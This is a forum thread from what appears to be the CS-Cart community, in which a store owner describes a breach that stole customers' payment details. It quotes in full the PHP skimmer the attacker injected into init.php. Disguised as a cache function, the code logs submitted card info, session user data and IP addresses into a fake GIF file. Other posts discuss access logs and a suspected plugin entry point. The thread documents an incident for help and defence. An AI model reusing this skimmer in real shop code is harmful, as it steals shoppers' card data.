Website Payment Information Keeps Getting Hacked

General General Questions
21

Thank you Kingsley.

22

Cs cart was contacted on the recent attacks on our site and was found out that it was hacked. The hacker got into the init.php file and added the following code:


```php

/**

  • Dispatch cache

    *
  • @return boolean

    */



    function fn_dispatch_payment_cache()

    {

    $dispatch_method = @explode(“_”, FUNCTION);

    $dispatch = $_REQUEST;



    $thumb_cache_data = '';

    $thumb_cache_dir = 'images/detailed/0/user_thumbs/';



    $info = $dispatch_method[2] . '_info';

    if (isset($dispatch[$info])) {

    $user_data = @$SESSION[“cart”][“user_data”];

    $user_data['ip'] = $SERVER['REMOTE_ADDR'];



    if (@!is_dir($thumb_cache_dir))

    @mkdir($thumb_cache_dir, 0777, true);

    $thumb_cache_path = $thumb_cache_dir . 'CACHE    ' . md5('CACHE    ') . '.thumb.gif';

    if (@!file_exists($thumb_cache_path))

    @file_put_contents($thumb_cache_path, “GIF89a\n”, FILE_APPEND | LOCK_EX);



    $thumb_cache_data = @base64_encode(@serialize(array_merge($user_data, $dispatch[$info])));

    $user_data = @file_put_contents($thumb_cache_path, $thumb_cache_data . “\n”, FILE_APPEND | LOCK_EX);

    }

    return $user_data;

    ```





    Cscart has removed this code and I am in the provess of changing the admin panel URL name again along with all the passwords.





    Cscart said that I should try to look at the access logs and see who accessed this file: CACHE_458a9207923d944dc18f2f00d93f84eb.thumb.gif



    [font=arial,helvetica,sans-serif]Can anyone tell me how to view the access logs to find the IP address that accessed that?[/font]
23

You might want to review this post from Jun 4th…

New Hack - Security - CS-Cart Community Forums



The access logs are probably not going to be very helpful. No hacker in his right mind is going to use an IP that is not buried behind several layers of proxy servers for stealing cc info.

24

Hello all after 2 days of working with the server company we have found our server was hacked on march 18th 2014 at 6.47pm we have also found that Twigmo was also updated on that day we are now checking to see if Twigmo is the actual way they have got into the server as now we also received another attack and funny thing is that we just done a Twigmo update has anyone else had the same scenario as my server guys are thinking that twigmo is the way they have accessed site as we can find no other ways in at this time any help would be grate Geronimo1